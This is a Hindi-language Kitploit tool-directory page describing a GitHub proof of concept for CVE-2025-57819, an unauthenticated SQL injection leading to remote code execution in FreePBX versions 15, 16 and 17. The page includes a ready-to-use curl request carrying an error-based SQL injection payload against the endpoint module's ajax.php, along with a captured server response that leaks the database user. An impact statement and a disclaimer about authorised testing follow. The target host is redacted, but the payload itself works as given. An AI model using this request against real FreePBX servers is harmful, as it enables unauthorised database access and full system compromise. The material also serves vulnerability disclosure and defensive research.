Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SQL-Injection-and-RCE_CVE-2025-57819 — FreePBX संस्करण 15, 16 और 17 में रिमोट कोड निष्पादन (RCE) भेद्यता मौजूद है, जो एंडपॉइंट्स में उपयोगकर्ता द्वारा आपूर्ति किए गए डेटा के अपर्याप्त सैनिटाइज़ेशन के कारण होती है। | Kitploit
उपकरण/GitHubGitHub/muhammadwaseem29/sql-injection-and-rce_cve-2025-57819
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmuhammadwaseem29/sql-injection-and-rce_cve-2025-57819

SQL-Injection-and-RCE_CVE-2025-57819

FreePBX संस्करण 15, 16 और 17 में रिमोट कोड निष्पादन (RCE) भेद्यता मौजूद है, जो एंडपॉइंट्स में उपयोगकर्ता द्वारा आपूर्ति किए गए डेटा के अपर्याप्त सैनिटाइज़ेशन के कारण होती है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखेंवेबसाइट
7211 महीने पहलेअभी तक समीक्षित नहीं

FreePBX RCE PoC (अप्रमाणित)

सारांश

FreePBX संस्करण 15, 16, और 17 में रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता है, जो एंडपॉइंट्स में उपयोगकर्ता-आपूर्ति डेटा के अपर्याप्त सैनिटाइज़ेशन के कारण होती है।
एक अप्रमाणित हमलावर डेटाबेस में हेरफेर कर सकता है और रिमोट कोड एक्ज़ीक्यूशन प्राप्त कर सकता है। एक्सप्लॉइट के लिए किसी प्रमाणीकरण की आवश्यकता नहीं है।

संदर्भ

  • https://github.com/freepbx/security-reporting/security/advisories/ghsa-m42g-xg4c-5f3h

प्रूफ ऑफ कॉन्सेप्ट (PoC)

नोट: लक्ष्य को हटा दिया गया है। अधिकृत परीक्षण करते समय [REDACTED_TARGET] को वास्तविक होस्ट से बदलें।

अनुरोध

root@kitploit:~
curl -i -k "https://[REDACTED_TARGET]/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x'+AND+EXTRACTVALUE(1,CONCAT('~USER:',(SELECT+USER()),'~'))+--+"

प्रतिक्रिया (परीक्षण के दौरान कैप्चर किया गया उदाहरण)

root@kitploit:~
HTTP/1.1 500 Internal Server Error
Date: Fri, 12 Sep 2025 08:35:29 GMT
Server: Apache/2.4.6 (Sangoma) OpenSSL/1.0.1e-fips PHP/5.6.31
X-Powered-By: PHP/5.6.31
Set-Cookie: PHPSESSID=fmt7o0oecththmves36nijvfu7; expires=Sun, 12-Oct-2025 08:35:29 GMT; Max-Age=2592000; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json

{"error":{"type":"Exception","message":"SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~USER:freepbxuser@localhost~'::","file":"\/var\/www\/html\/admin\/libraries\/utility.functions.php","line":207}}

यह क्यों साबित करता है: प्रतिक्रिया में ~USER:freepbxuser@localhost~ शामिल है — जो अप्रमाणित अनुरोध से SQL इंजेक्शन / डेटा प्रकटीकरण की पुष्टि करता है।

carbon (1)

प्रभाव

अप्रमाणित रिमोट डेटाबेस हेरफेर जो सर्वर पर मनमाना कोड निष्पादन की ओर ले जाता है — पूर्ण सिस्टम समझौता संभव है।


अस्वीकरण

यह रिपॉजिटरी और PoC केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए प्रदान किए गए हैं। स्पष्ट अनुमति के बिना सिस्टम का परीक्षण या शोषण न करें। लेखक इस PoC से उत्पन्न दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।

root@kitploit:~
टूल डाउनलोड करें